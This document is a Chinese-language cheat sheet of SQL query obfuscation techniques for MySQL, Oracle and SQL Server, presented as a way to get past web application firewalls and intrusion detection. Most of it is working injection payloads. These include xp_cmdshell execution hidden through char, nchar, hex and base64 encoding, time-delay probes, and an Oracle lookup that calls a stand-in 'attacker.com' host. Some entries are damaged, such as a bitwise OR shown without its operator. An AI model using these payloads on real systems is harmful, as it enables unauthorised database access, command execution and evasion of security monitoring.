混淆查询帮助绕过Web应用程序防火墙(WAF)和入侵检测/预防系统(IDS / IPS)。以下是基本查询混淆的示例,它们在应用于某些注入之前可能需要进行修改。
MySQL
| 描述 | 语句 |
|---|---|
| ASCII>字符 | SELECT char(65) |
| 字符> ASCII | SELECT ascii(’A’) |
| 十六进制 | SELECT 0x4A414B45 |
| Hex> Int | SELECT 0x20 + 0x40 |
| 按位与 | SELECT 6 & 2 |
| 按位或 | SELECT 6 |
| 按位否定 | SELECT ~6 |
| 按位XOR | SELECT 6 ^ 2 |
| 右移 | SELECT 6>>2 |
| 左移 | SELECT 6<<2 |
| 字符串截取 | SELECT substr(‘abcd’, 3, 2) substr(string, index, length) |
| Casting | SELECT cast(‘1’ AS unsigned integer) SELECT cast(‘123’ AS char) |
| 字符串连接 | SELECT concat(‘net’,’spi’) SELECT ‘n’ ‘et’ ‘spi’ |
| 无引号 | SELECT CONCAT(CHAR(74),CHAR(65),CHAR(75),CHAR(69)) |
| 块注释 | SELECT/*block comment*/”test” |
| 单行注释 | SELECT 1 — comments out rest of line SELECT 1 # comments out rest of line |
| 无空格 | SELECT(username)FROM(USERS)WHERE(username=’netspi’) |
| 允许空白 | 09, 0A, 0B, 0C, 0D, A0, 20 |
| URL 编码 | SELECT%20%2A%20FROM%20USERS |
| 双URL编码 | SELECT%2520%2A%2520FROM%2520USERS |
| 无效百分号编码 | %SEL%ECT * F%R%OM U%S%ERS |
进一步阅读请点击这里
Oracle
| 描述 | 语句 |
|---|---|
| ASCII>字符 | SELECT char(65) from dual |
| 字符> ASCII | SELECT ascii(‘A’) from dual |
| 按位AND | SELECT 6 & 2 from dual |
| 按位或 | SELECT 6 from dual |
| 按位否定 | SELECT ~6 from dual |
| 按位XOR | SELECT 6 ^ 2 from dual |
| 选择第N个字符 | SELECT substr(‘abcd’, 3, 1) FROM dual; — Returns 3rd charcter, ‘c’ |
| 字符串截取 | SELECT substr(‘abcd’, 3, 2) from dual substr(string, index, length) |
| Cast | select CAST(12 AS CHAR(32)) from dual |
| 字符串连接 | SELECT concat(‘net’,’spi’) from dual |
| 注释 | SELECT 1 FROM dual — comment |
| If 语句 | BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; |
| Case 语句 | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — Returns 1 SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — Returns 2 |
| 时间延迟 | BEGIN DBMS_LOCK.SLEEP(5); END; (Requires Privileges) SELECT UTL_INADDR.get_host_name(‘10.0.0.1’) FROM dual; SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; |
| 选择第n行 | SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — Returns 9th row |
| 按位与 | SELECT bitand(6,2) FROM dual; — Returns 2 SELECT bitand(6,1) FROM dual; — Returns 0 |
| 字符串连接 | SELECT ‘A’ || ‘B’ FROM dual; — Returns AB |
| 避免引号 | SELECT chr(65) || chr(66) FROM dual; — Returns AB |
| 16进制编码 | SELECT 0x75736572 FROM dual; |
SQL Server
| 描述 | 语句 |
|---|---|
| ASCII>字符 | SELECT char(65) |
| 字符> ASCII | SELECT ascii(’A’) |
| Hex> Int | SELECT 0x20 + 0x40 |
| 按位AND | SELECT 6 & 2 |
| 按位或 | SELECT 6 |
| 按位否定 | SELECT ~6 |
| 按位XOR | SELECT 6 ^ 2 |
| 字符串截取 | SELECT substring(‘abcd’, 3, 2) substring(string, index, length) |
| Casting | SELECT cast(‘1’ AS unsigned integer) SELECT cast(‘123’ AS char) |
| 字符串连接 | SELECT concat(‘net’,’spi’) |
| 注释 | SELECT 1 –comment SELECT/*comment*/1 |
| 避免引号 | SELECT char(65)+char(66) — returns AB |
| 使用%0d避免使用分号 | %0dwaitfor+delay+'0:0:10'-- |
| Bypass Filtering | EXEC xP_cMdsheLL ‘dir’; |
| 用注释避免空格 | EXEC/**/xp_cmdshell/**/’dir’;– ‘;ex/**/ec xp_cmds/**/hell ‘dir’; |
| 用连接避免查询检测 | DECLARE @cmd as varchar(3000); SET @cmd = ‘x’+’p’+’_’+’c’+’m’+’d’+’s’+’h’+’e’+’l’+’l’+’/**/’+””+’d’+’i’+’r’+””; exec(@cmd); |
| 用字符编码避免查询检测 | DECLARE @cmd as varchar(3000); SET @cmd =(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+ CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116) +CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+ CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+ CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+ CHAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59)); EXEC(@cmd); |
| 用base64编码避免查询检测 | DECLARE @data varchar(max), @XmlData xml;SET @data = ‘ZXhlYyBtYXN0ZXIuLnhwX2NtZHNoZWxsICdkaXIn’; SET @XmlData = CAST(” + @data + ” as xml);SET @data = CONVERT(varchar(max), @XmlData.value(‘(data)[1]’, ‘varbinary(max)’)); exec (@data); |
| 用Nchar编码避免查询检测 | DECLARE @cmd as nvarchar(3000); SET @cmd =(nchar(101)+nchar(120)+nchar(101)+nchar(99)+ nchar(32)+nchar(109)+nchar(97)+nchar(115)+nchar(116)+ nchar(101)+nchar(114)+nchar(46)+nchar(46)+ nchar(120)+nchar(112)+nchar(95)+nchar(99)+nchar(109) +nchar(100)+nchar(115)+nchar(104)+ nchar(101)+nchar(108)+nchar(108)+nchar(32)+nchar(39)+nchar(100) +nchar(105)+nchar(114)+nchar(39)+nchar(59)); EXEC(@cmd); |
| 用ASCII + CAST 编码避免查询检测 | DECLARE @cmd as varchar(MAX); SET @cmd = cast(0x78705F636D647368656C6C202764697227 as varchar(MAX)); exec(@cmd); |
| 用ASCII + CONVERT 编码避免查询检测 | DECLARE @cmd as varchar(MAX); SET @cmd = convert(varchar(MAX),0x78705F636D647368656C6C202764697227); exec(@cmd); |
| 用varbinary(MAX) 避免查询检测 | DECLARE @cmd as varchar(MAX); SET @cmd = convert(varchar(0),0x78705F636D647368656C6C202764697227); exec(@cmd); |
| 用 sp_sqlexec 避免 EXEC() | DECLARE @cmd as varchar(3000); SET @cmd = convert(varchar(0),0×78705F636D647368656C6C202764697227); exec sp_sqlexec @cmd; |
| 执行 xp_cmdshell ‘dir’ | DECLARE @tmp as varchar(MAX); SET @tmp = char(88)+char(80)+char(95)+char(67)+char(77)+ char(68)+char(83)+char(72)+char(69)+char(76)+char(76); exec @tmp ‘dir’; |
文章最后更新于 2021-09-22
